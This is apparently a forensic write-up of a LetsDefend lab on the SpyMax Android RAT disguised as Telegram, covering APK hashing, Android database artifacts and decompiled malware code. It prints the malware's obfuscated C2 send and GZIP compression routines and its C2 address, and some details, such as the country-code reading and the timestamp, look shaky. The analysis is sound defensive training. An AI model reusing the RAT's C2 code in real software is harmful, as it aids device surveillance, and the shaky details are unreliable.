This write‑up documents how I approached and solved the SpyMax Telegram RAT challenge on LetsDefend.

The scenario involves a victim who attempted to download the Telegram app on their Android device. Instead of using the official Google Play Store, the victim accessed a suspicious website advertising a “faster” download. The victim installed a malicious APK disguised as Telegram, resulting in a potential device compromise. The objective of this investigation was to analyze the APK and uncover key details about the attack.

In short, a user downloaded a malicious APK masquerading as a legitimate application. With that context, let’s dive into the analysis.

Initial Evidence

We are provided with an AD1 image, which stands for AccessData Logical Image. This is a forensic image format generated by tools such as FTK Imager and is commonly used in digital forensics.

What is the SHA-1 hash of the malicious APK file?

By opening the AD1 image in FTK Imager and navigating to the Downloads directory, the malicious APK can be identified. After exporting the APK and calculating its hash using a simple PowerShell command, the SHA‑1 hash is: a192df3e1ee4f74d4078180a465ebc157bbd886b

What type of attack did the victim fall for?

The victim was tricked into downloading a malicious APK by impersonating a trusted app. Impersonation is a key signature for Phishing attacks.

What is the malicious domain associated with this attack?

This question refers to the domain from which the malicious APK was downloaded. On android devices the file

/data/data/com.android.providers.downloads/databases/downloads.db

is an SQLite database that stores metadata about downloaded files.

I exported this database using FTK Imager and opened it with DB Browser for SQLite. Among the various tables, the downloads table contains a uri column, which records the download source. The malicious domain identified in this column is: piay.google.com

What is the IP address and port of the Command and Control (C2) server used by the malicious app?

To answer this question, the APK had to be reverse engineered. I used JADX GUI to decompile and inspect the application.

Given the nature of SpyMax, I assumed the malware would communicate with its C2 server either via HTTP or raw sockets. Searching for HTTP-related artifacts did not yield results, but searching for socket-related code did.

Although the code is heavily obfuscated, a key method call stood out:

vhnvitlsjqhpnpdnttkkdpfhpbikoymknsrbkhwtaggb4244.ad = InetAddress.getByName(split[i]

This method resolves a hostname to an IP address.

Further analysis showed that the hostname and port were being parsed from values loaded at runtime. Tracing the variable assignments revealed that these values originate from the strings.xml resource file.

Inspecting strings.xml revealed the C2 server information: 192.168.245.130:7771

What is the name of the function responsible for compressing data in the malicious APK?

The malware compresses data before transmitting it to the C2 server, most likely to reduce network size and evade detection.

While inspecting socket OutputStream writes, I identified the following code:

try {
  synchronized (vhnvitlsjqhpnpdnttkkdpfhpbikoymknsrbkhwtaggb4244.y) {
    byte[] f = agnaxqpowggbffhkaekewcuxcclwqkwjdjouvkriwwqmkafbpjzcvxcxlpxuetxmjxxwqnpqnchzmincxkhhkunfgrifmwdc4245.f(str, bArr);
    vhnvitlsjqhpnpdnttkkdpfhpbikoymknsrbkhwtaggb4244.k.setSendBufferSize(f.length);
    vhnvitlsjqhpnpdnttkkdpfhpbikoymknsrbkhwtaggb4244.out.write(f, 0, f.length);
  }
} catch (Exception unused) {
  vhnvitlsjqhpnpdnttkkdpfhpbikoymknsrbkhwtaggb4244.di();
}

the vhnv…ggb4244.out.write call is writing data to the output stream, the data being written is the result of calling ag…mdc4245.f

public static byte[] f(String str, byte[] bArr) throws Exception {
  ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
  byte[] cZp = cZp(str.getBytes());
  byte[] cZp2 = cZp(bArr);
  byte[] bytes = String.valueOf(cZp.length).getBytes();
  byte[] bytes2 = String.valueOf(cZp2.length).getBytes();
  byteArrayOutputStream.write(bytes, 0, bytes.length);
  byteArrayOutputStream.write(0);
  byteArrayOutputStream.write(bytes2, 0, bytes2.length);
  byteArrayOutputStream.write(0);
  byteArrayOutputStream.write(cZp, 0, cZp.length);
  byteArrayOutputStream.write(cZp2, 0, cZp2.length);
  byte[] byteArray = byteArrayOutputStream.toByteArray();
  try {
    byteArrayOutputStream.close();
  } catch (Exception unused) {
  }
  return byteArray;
}

this method is writing multiple bytes to a byteArrayOutputStream object and returning it as a single byte array.

the cZp method stands out here, inspecting it further its evident its the method doing the compression.

public static byte[] cZp(byte[] bArr) throws Exception {
  ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream(bArr.length);
  GZIPOutputStream gZIPOutputStream = new GZIPOutputStream(byteArrayOutputStream);
  gZIPOutputStream.write(bArr);
  gZIPOutputStream.close();
  byte[] byteArray = byteArrayOutputStream.toByteArray();
  byteArrayOutputStream.close();
  return byteArray;
}

What phone number did the attacker dial?

similar to downloads db, the file

/data/data/com.android.providers.contacts/databases/contacts2.db

holds various informations related to Calls, Phone numbers etc.

After opening this database in DB Browser for SQLite and inspecting the calls table, I found a single dialed number: 09436521458754

What is the decryption key that was left by the attacker?

The SMS database is located at:

/data/data/com.android.providers.telephony/databases/mmssms.db

Inspecting this database revealed an SMS sent to the same phone number. The message content is:

Urer vf gur qrpelcgvba xrl: mPyQd9sr0nlgXssda648Y0ZyAwbmxTCp Nccyl vg vzzrqvngryl gb npprff gur svyrf. Pbasvez bapr vg’f qbar.

Which resembeles a lot the result of Caesar shift, Decoding it produces the following message

Here is the decryption key: zClDq9fe0aytKffqn648L0MlNjozkGPc Apply it immediately to access the files. Confirm once it’s done.

To which location or service does the dialed number belong?

Running a simple google search for the country code 94 revealed the number belonged to Sri Lanka.

When was the last time the malicious APK was active?

Inspecting the “/data/system/usagestats/0/yearly” xml file and searching using the package name, i found it was last active on 17355124949.